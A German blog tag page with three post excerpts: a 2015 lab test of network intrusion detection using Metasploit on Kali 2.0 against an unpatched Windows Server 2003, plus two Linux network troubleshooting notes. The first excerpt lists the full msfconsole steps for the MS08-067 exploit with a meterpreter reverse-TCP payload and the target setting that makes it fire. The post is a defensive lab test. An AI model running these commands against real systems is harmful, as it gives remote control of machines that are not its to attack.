Artikel mit ‘Linux’ getagged

Test Intrusion Detection mit Metasploit / Kali 2.0

Montag, 28. September 2015

Um die Intrusion Detection unseres Netzwerkes zu testen, habe ich ein wenig mit Kali / Metasploit herum experimentiert.

Als Ziel habe ich einen ungepatchten Windows 2003 R2 Server (deutsch) auf einem ESXi verwendet.

Als Angreifer kam ein Kali 2.0 ebenfalls auf einem ESXi zum Einsatz.

Als Exploit bietet sich hier immer der MS08_067 an, da dieser in der Regel relativ zuverlässig „zündet“.

Jedoch leider nicht auf meinem Deutschen Server – hierfür ist ggf. die dedizierte Angabe des Targets nötig.


msfconsole -q
use exploit/windows/smb/ms08_067_netapi
set payload windows/meterpreter/reverse_tcp
set RHOST Ziel.IP
set LHOST Quell.IP
set target 66
exploit

Ohne die Angabe des Target stürzt der Server Dienst am Ziel immer „nur“ ab – jedoch wird der Payload nicht ausgeführt.

Mit Show Targets kann man sich alle Möglichkeiten anzeigen lassen – wobei hier das NX oder NO NX glaube ich eine entscheidende Rolle spielt 🙂

Linux Suse 10.3 VMware Tools ESX 3.5
Netzwerk Probleme

Dienstag, 08. Februar 2011

Der gestrige Tag war nicht meiner …
Nach dem Reboot einer unserer Linux Server am Wochenende war die Netzwerkkonnektivität zu Teufel …

Ping von und zum Host funktioniert 1a – Auf alles andere Antwortet der Host von Remote nicht.
Lokal funktioniert z.B. SSH und HTTP – nur von extern nicht. Auch alle Verbindungen vom Host nach extern funktionieren nicht z.B. DNS anfragen.

Also flugs ein Backup aus Dezember in einen anderen Host eingespielt – das zeigt aber das selbe Problem 🙁
(mehr …)

Linux altes eth0 löschen zurücksetzten
delete reset old eth0

Montag, 07. Februar 2011

Wie beim Windows auch wird beim entfernen einer alten und hinzufügen einer neuen Netzwerkkarte und Linux das alte Gerät nicht gelöscht.

Unter Windows zeigt sich die indem den der Name der LAN-Verbindung hinten um eine Zahl ergänzt wird.

Unter Linux wir einfach das ethernet interface hochgezählt -> eth0 -> eth1 -> eth2
(mehr …)